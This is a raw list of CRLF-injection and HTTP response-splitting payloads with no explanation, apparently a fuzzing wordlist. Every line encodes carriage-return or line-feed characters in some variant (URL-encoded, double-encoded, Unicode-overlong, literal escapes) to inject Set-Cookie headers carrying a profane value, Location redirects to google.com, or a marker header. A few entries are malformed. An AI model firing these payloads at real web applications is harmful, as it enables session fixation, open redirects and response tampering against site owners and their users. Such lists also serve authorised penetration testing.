%0d%0aLocation:www.google.com%0d%0a
%0d%0aSet-Cookie:name=fucked;
\r\n\tSet-Cookie:name=fucked;
\r\tSet-Cookie:name=fucked;
%E5%98%8A%E5%98%8DLocation:www.google.com
\rSet-Cookie:name=fucked;
\r%20Set-Cookie:name=fucked;
\r\nSet-Cookie:name=fucked;
\r\n%20Set-Cookie:name=fucked;
\rSet-Cookie:name=fucked;
%u000ASet-Cookie:name=fucked;
\r%20Set-Cookie:name=fucked;
%23%0D%0ALocation:www.google.com;
\r\nSet-Cookie:name=fucked;
\r\n%20Set-Cookie:name=fucked;
\r\n\tSet-Cookie:name=fucked;
\r\tSet-Cookie:name=fucked;
%5cr%5cnLocation:www.google.com
%E5%98%8A%E5%98%8D%0D%0ASet-Cookie:name=fucked;
\rSet-Cookie:name=fucked;
\r%20Set-Cookie:name=fucked;
\r\nSet-Cookie:name=fucked;
\r\n%20Set-Cookie:name=fucked;
\r\n\tSet-Cookie:name=fucked;
\r\tSet-Cookie:name=fucked;
%0AHeader-Test:fucked
%0A%20Header-Test:fucked
%20%0AHeader-Test:fucked
%23%OAHeader-Test:fucked
%E5%98%8A%E5%98%8DHeader-Test:fucked
%E5%98%8A%E5%98%8D%0AHeader-Test:fucked
%3F%0AHeader-Test:fucked
crlf%0AHeader-Test:fucked
crlf%0A%20Header-Test:fucked
crlf%20%0AHeader-Test:fucked
crlf%23%OAHeader-Test:fucked
crlf%E5%98%8A%E5%98%8DHeader-Test:fucked
crlf%E5%98%8A%E5%98%8D%0AHeader-Test:fucked
crlf%3F%0AHeader-Test:fucked
%0DHeader-Test:fucked
%0D%20Header-Test:fucked
%20%0DHeader-Test:fucked
%23%0DHeader-Test:fucked
%23%0AHeader-Test:fucked
%E5%98%8A%E5%98%8DHeader-Test:fucked
%E5%98%8A%E5%98%8D%0DHeader-Test:fucked
%3F%0DHeader-Test:fucked
crlf%0DHeader-Test:fucked
crlf%0D%20Header-Test:fucked
crlf%20%0DHeader-Test:fucked
crlf%23%0DHeader-Test:fucked
crlf%23%0AHeader-Test:fucked
crlf%E5%98%8A%E5%98%8DHeader-Test:fucked
crlf%E5%98%8A%E5%98%8D%0DHeader-Test:fucked
crlf%3F%0DHeader-Test:fucked
%0D%0AHeader-Test:fucked
%0D%0A%20Header-Test:fucked
%20%0D%0AHeader-Test:fucked
%23%0D%0AHeader-Test:fucked
\r\nHeader-Test:fucked
 \r\n Header-Test:fucked
\r\n Header-Test:fucked
%5cr%5cnHeader-Test:fucked
%E5%98%8A%E5%98%8DHeader-Test:fucked
%E5%98%8A%E5%98%8D%0D%0AHeader-Test:fucked
%3F%0D%0AHeader-Test:fucked
crlf%0D%0AHeader-Test:fucked
crlf%0D%0A%20Header-Test:fucked
crlf%20%0D%0AHeader-Test:fucked
crlf%23%0D%0AHeader-Test:fucked
crlf\r\nHeader-Test:fucked
crlf%5cr%5cnHeader-Test:fucked
crlf%E5%98%8A%E5%98%8DHeader-Test:fucked
crlf%E5%98%8A%E5%98%8D%0D%0AHeader-Test:fucked
crlf%3F%0D%0AHeader-Test:fucked
%0D%0A%09Header-Test:fucked
crlf%0D%0A%09Header-Test:fucked
%250AHeader-Test:fucked
%25250AHeader-Test:fucked
%%0A0AHeader-Test:fucked
%25%30AHeader-Test:fucked
%25%30%61Header-Test:fucked
%u000AHeader-Test:fucked
//www.google.com/%2F%2E%2E%0D%0AHeader-Test:fucked
/www.google.com/%2E%2E%2F%0D%0AHeader-Test:fucked
/google.com/%2F..%0D%0AHeader-Test:fucked